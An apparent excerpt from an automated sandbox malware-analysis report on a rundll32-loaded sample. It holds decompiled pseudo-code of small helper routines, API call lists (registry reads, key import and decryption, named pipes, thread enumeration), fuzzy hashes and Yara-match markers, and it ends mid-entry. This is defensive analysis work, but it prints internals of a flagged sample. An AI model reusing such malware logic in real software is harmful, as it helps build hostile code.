                          • RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 0716bc5792f395795cf1084d38af9bea653d2f20c79dd2801d0cbde968bffd1a
                          • Instruction ID: aca8fe22361a2f01d826c6c923a79ab3e41970d81684ec7c78a221d2ebc8b97c
                          • Opcode Fuzzy Hash: 0716bc5792f395795cf1084d38af9bea653d2f20c79dd2801d0cbde968bffd1a
                          • Instruction Fuzzy Hash: 4FB01271200300EFCB338B00DE04F057A21A750700F004020B3880007982370420FB15
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010013C7 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010013C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E01006FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E01006D63(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E01006C2C(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E01006EE7(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E01005FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                          0x010013d2
                          0x010013d5
                          0x010013dc
                          0x010013df
                          0x010013e2
                          0x010013e7
                          0x010014e3
                          0x010014e7
                          0x010013f9
                          0x01001405
                          0x0100140c
                          0x01001413
                          0x00000000
                          0x00000000
                          0x01001419
                          0x01001421
                          0x00000000
                          0x00000000
                          0x01001427
                          0x01001430
                          0x01001434
                          0x00000000
                          0x00000000
                          0x01001436
                          0x0100143d
                          0x01001442
                          0x01001445
                          0x01001447
                          0x010014c8
                          0x010014cf
                          0x010014d1
                          0x00000000
                          0x00000000
                          0x010014d3
                          0x010014d7
                          0x010014dc
                          0x010014dc
                          0x00000000
                          0x010014d7
                          0x0100144e
                          0x01001456
                          0x01001456
                          0x0100145f
                          0x0100146d
                          0x010014c4
                          0x010014c4
                          0x00000000
                          0x01001490
                          0x01001493
                          0x00000000
                          0x01001493
                          0x0100146d
                          0x010014a2
                          0x010014b0
                          0x010014b5
                          0x010014b7
                          0x010014cc
                          0x00000000
                          0x010014cc
                          0x010014b9
                          0x010014bf
                          0x010014c2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010014c2

                          APIs
                          • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 0100144E
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                          • Instruction ID: de91cd240d38ea80c5e559242477c11b0ae525720607c07ca33a66540375f385
                          • Opcode Fuzzy Hash: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                          • Instruction Fuzzy Hash: DE311E71900119AFEF63DE98C980BEEB7F9BB04304F1544A9E689A71D1DA30DE84CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00D21760 Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.506070289.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_d20000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 951354d5fa6a4d792915017ee513dc9f8d5267a0e180b5e1bb3bc268014f78d0
                          • Instruction ID: e245deac8abb692073bfa29d984136cda85a9e0290344d0738eda72e67cd84a2
                          • Opcode Fuzzy Hash: 951354d5fa6a4d792915017ee513dc9f8d5267a0e180b5e1bb3bc268014f78d0
                          • Instruction Fuzzy Hash: 434102B49002069FDB44CF68C5947AABBF0FF48308F24856DD858AB341E77AA946CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7FD24 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,05B6E30A,?), ref: 05B7FDB6
                            • Part of subcall function 05B7AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,05B663CD,00000000,00000001,-00000007,?,00000000), ref: 05B7AFA6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                          • String ID:
                          • API String ID: 1301464996-0
                          • Opcode ID: d3759f1cdcd6d0f6bfd48f6bb180c7eef218cfc3e141d984429b8c6002a1823f
                          • Instruction ID: 9319e1bb7558d38ac25c2aebf65ac1b7bca1de450a92b1f52e4263fa15174289
                          • Opcode Fuzzy Hash: d3759f1cdcd6d0f6bfd48f6bb180c7eef218cfc3e141d984429b8c6002a1823f
                          • Instruction Fuzzy Hash: BE11A371A14209AFDB54DB48DC92EBE7BBAEF44350F1000A9F511DB251DBB4BE00DB58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B72BFD Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.NTDLL(?,05B8A324,00000018,05B76FFC,05FB8E36,?,05B76FFC,05FB8E36,?,05B76FFC,05FB8E36,?,?,?,?,05B76FFC), ref: 05B72CB2
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: 9126607227d3f4ed61d9ba3ee36d0a97c9f0b25f52d07c73d1ab4c28f46f2a89
                          • Instruction ID: 61f50649937201c69591c2ceeaf6228153cbbcd3e1295109d4bf6f8489ac81a4
                          • Opcode Fuzzy Hash: 9126607227d3f4ed61d9ba3ee36d0a97c9f0b25f52d07c73d1ab4c28f46f2a89
                          • Instruction Fuzzy Hash: 7211DC75224209ABC714EFA9EC46CB13FAAF795231704A067F5198B250EF303402CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6708F Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05B67100
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64975
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,00000020,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64984
                            • Part of subcall function 05B6EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05B6EE2A
                            • Part of subcall function 05B6EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05B6EE36
                            • Part of subcall function 05B6EE04: GetModuleHandleA.KERNEL32(?,05FB978E,00000000,?,00000000), ref: 05B6EE56
                            • Part of subcall function 05B6EE04: GetProcAddress.KERNEL32(00000000), ref: 05B6EE5D
                            • Part of subcall function 05B6EE04: Thread32First.KERNEL32(?,0000001C), ref: 05B6EE6D
                            • Part of subcall function 05B6EE04: CloseHandle.KERNEL32(?), ref: 05B6EEB5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                          • String ID:
                          • API String ID: 2627809124-0
                          • Opcode ID: b13ca00bc7d8912139fb7b129c459555d8e82ca4dd770550d279730ceab6e42c
                          • Instruction ID: d22457c72036548dc3d4fd7328ce72dfc492bf8b401da20223edc176c6da9d41
                          • Opcode Fuzzy Hash: b13ca00bc7d8912139fb7b129c459555d8e82ca4dd770550d279730ceab6e42c
                          • Instruction Fuzzy Hash: 2B018B71620104BF9B11EBA9DC89CAFBBEEEF466587101096F401A3140DE39BE05DBB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B8157A Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,05B704AC,05B7C384,00000000,00000000), ref: 05B815F0
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64975
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,00000020,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64984
                            • Part of subcall function 05B63172: lstrlen.KERNEL32(05B643C6,00000000,?,?,?,?,05B643C6,00000035,00000000,?,00000000), ref: 05B631A2
                            • Part of subcall function 05B63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 05B631B8
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,05B643C6,00000000,?,?,05B643C6,00000035,00000000), ref: 05B631EE
                            • Part of subcall function 05B63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,05B643C6,00000035), ref: 05B63209
                            • Part of subcall function 05B63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05B63227
                            • Part of subcall function 05B63172: GetLastError.KERNEL32(?,?,05B643C6,00000035), ref: 05B63231
                            • Part of subcall function 05B63172: HeapFree.KERNEL32(00000000,00000000,?,?,05B643C6,00000035), ref: 05B63254
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                          • String ID:
                          • API String ID: 730886825-0
                          • Opcode ID: 7fd5d87fa5fcc585bc9cf2ea4b0f9a24c1674aeaa07425b3c499d19446d1492c
                          • Instruction ID: 69293edaf6dd5ff1c0636cae8bbe479d4b4bfb8ebf69c8e6a022df906945bf6f
                          • Opcode Fuzzy Hash: 7fd5d87fa5fcc585bc9cf2ea4b0f9a24c1674aeaa07425b3c499d19446d1492c
                          • Instruction Fuzzy Hash: 54014C31621204BBDB21E798DC4AFAE7BE9EF46A10F101095F601A7180DA74BA05D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74837 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • memset.NTDLL ref: 05B74855
                            • Part of subcall function 05B7A451: memset.NTDLL ref: 05B7A477
                            • Part of subcall function 05B7A451: memcpy.NTDLL ref: 05B7A49F
                            • Part of subcall function 05B7A451: GetLastError.KERNEL32(00000010,00000218,05B8386D,00000100,?,00000318,00000008), ref: 05B7A4B6
                            • Part of subcall function 05B7A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05B8386D,00000100), ref: 05B7A599
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 4290293647-0
                          • Opcode ID: dc30e0c9d0c999d9d9bd202eb367c783009107a9c26922d01094a271e86e9c44
                          • Instruction ID: 6831afc7fdcf401950b2e9243d99e200fef5aab0d79a49c691be6015d5f5d2dd
                          • Opcode Fuzzy Hash: dc30e0c9d0c999d9d9bd202eb367c783009107a9c26922d01094a271e86e9c44
                          • Instruction Fuzzy Hash: CA01A27160175C6BCB219E29D848F6A3BECEF45714F0485A9F86897250D771F9048AA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100155C Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0100155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E010012CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x100a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E01001B6F(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                          0x0100155c
                          0x01001564
                          0x0100157b
                          0x01001596
                          0x0100159a
                          0x0100159f
                          0x010015a1
                          0x010015b3
                          0x010015bf
                          0x010015a3
                          0x010015a3
                          0x010015a8
                          0x010015ad
                          0x010015ad
                          0x010015a1
                          0x010015c5
                          0x010015c9
                          0x010015c9
                          0x01001570
                          0x01001575
                          0x01001579
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                            • Part of subcall function 01001B6F: SysFreeString.OLEAUT32(00000000), ref: 01001BD2
                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76CDF710,?,00000000,?,00000000,?,010021A9,?,004F0053,05299400,00000000,?), ref: 010015BF
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Free$HeapString
                          • String ID:
                          • API String ID: 3806048269-0
                          • Opcode ID: 151762d4ba2e42b3daecaad09d266d5b032f25a96f2b534e38efe0ff0b88a18b
                          • Instruction ID: 2817c98335d1b19cd068f72a28c48de33bdd7fcc24ea563089a2f554a4fb418c
                          • Opcode Fuzzy Hash: 151762d4ba2e42b3daecaad09d266d5b032f25a96f2b534e38efe0ff0b88a18b
                          • Instruction Fuzzy Hash: F8011A32100619EBEB239F98DC01EEA3BA5EF14751F088424BA459A1A4E732D9609BD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010024B3 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E010024B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E01005FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E01006D63(_a8 + _a8);
					if(_t21 != 0) {
						E0100298F(_a4, _t21, _t23);
					}
					E01006C2C(_a4);
				}
				return _t21;
			}





                          0x010024bb
                          0x010024c2
                          0x010024c4
                          0x010024d3
                          0x010024da
                          0x010024e9
                          0x010024ed
                          0x010024f4
                          0x010024f4
                          0x010024fc
                          0x01002501
                          0x01002506

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 010024C4
                            • Part of subcall function 01005FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010024D8,00000001,010058D7,00000000), ref: 01005FF3
                            • Part of subcall function 01005FBB: memcpy.NTDLL(010024D8,010058D7,00000010,?,?,?,010024D8,00000001,010058D7,00000000,?,01001D97,00000000,010058D7,?,75BCC740), ref: 0100600C
                            • Part of subcall function 01005FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01006035
                            • Part of subcall function 01005FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0100604D
                            • Part of subcall function 01005FBB: memcpy.NTDLL(00000000,75BCC740,052995B0,00000010), ref: 0100609F
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                          • String ID:
                          • API String ID: 894908221-0
                          • Opcode ID: fae872d31bbfc9b1384f8506ecd0394ca5bb22bc45137af9d6bd94fede0b15d4
                          • Instruction ID: f0351856715ef522f47afe87047e49203dafd714c24bc14da821825399835e8c
                          • Opcode Fuzzy Hash: fae872d31bbfc9b1384f8506ecd0394ca5bb22bc45137af9d6bd94fede0b15d4
                          • Instruction Fuzzy Hash: 23F05E3610010ABBEF136F59DC44DEB7FAEEF953A0F018022FD49CA054DA32DA559BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010074B6 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E010074B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E010023D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E010014F1(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                          0x010074be
                          0x010074d8
                          0x00000000
                          0x010074f4
                          0x010074cf
                          0x010074d6
                          0x00000000
                          0x00000000
                          0x010074fb

                          APIs
                          • lstrlenW.KERNEL32(?,?,?,0100363B,3D010090,80000002,01007168,01007283,74666F53,4D4C4B48,01007283,?,3D010090,80000002,01007168,?), ref: 010074DB
                            • Part of subcall function 010014F1: SysAllocString.OLEAUT32(01007283), ref: 0100150A
                            • Part of subcall function 010014F1: SysFreeString.OLEAUT32(00000000), ref: 0100154B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: String$AllocFreelstrlen
                          • String ID:
                          • API String ID: 3808004451-0
                          • Opcode ID: 50853b06cbfb02ea0d27cfa422e3900a3cd966fb7d75820020ed3c35e69e1091
                          • Instruction ID: 4c823dc2298c85d8e1225af9a03c3f78c4657f398a1829d39dbef1193afdf463
                          • Opcode Fuzzy Hash: 50853b06cbfb02ea0d27cfa422e3900a3cd966fb7d75820020ed3c35e69e1091
                          • Instruction Fuzzy Hash: E3F0923200010EBFEF129F90EC05EEA3F6AAB18354F058024FA84541B1DB76D5B1EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01002B23 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01002B23(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E01002575(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E01006C2C(_a4);
				}
				return _t12;
			}





                          0x01002b2f
                          0x01002b34
                          0x01002b38
                          0x01002b3f
                          0x01002b4a
                          0x01002b4e
                          0x01002b4e
                          0x01002b57

                          APIs
                            • Part of subcall function 01002575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,01004493,?), ref: 010025AB
                            • Part of subcall function 01002575: memset.NTDLL ref: 01002621
                            • Part of subcall function 01002575: memset.NTDLL ref: 01002635
                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,01004493,?,?,?,?), ref: 01002B3F
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memcpymemset$FreeHeap
                          • String ID:
                          • API String ID: 3053036209-0
                          • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                          • Instruction ID: de56c6f67caa259c8d5e3d9c8d0efafaec08cb26198a70d6186b46aaaff031ca
                          • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                          • Instruction Fuzzy Hash: 2FE08C7280152A7AEB132A94EC00EEF7F9CDF656D1F008020FE888A240E632C62097E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B673EB Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B673F5
                            • Part of subcall function 05B66261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 05B662A8
                            • Part of subcall function 05B66261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 05B662BE
                            • Part of subcall function 05B66261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05B66307
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open$Closememset
                          • String ID:
                          • API String ID: 1685373161-0
                          • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                          • Instruction ID: 7b504ae0ea57401382adeac96ae81dd14ce43003a69b2cd0defea32586239288
                          • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                          • Instruction Fuzzy Hash: 60E0173434011CBBDB10AE98DC5AFA97B59EF14754F008065BE18AE282DE72FAA0C795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B81E9D Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                          Download Yara Rule
                          APIs
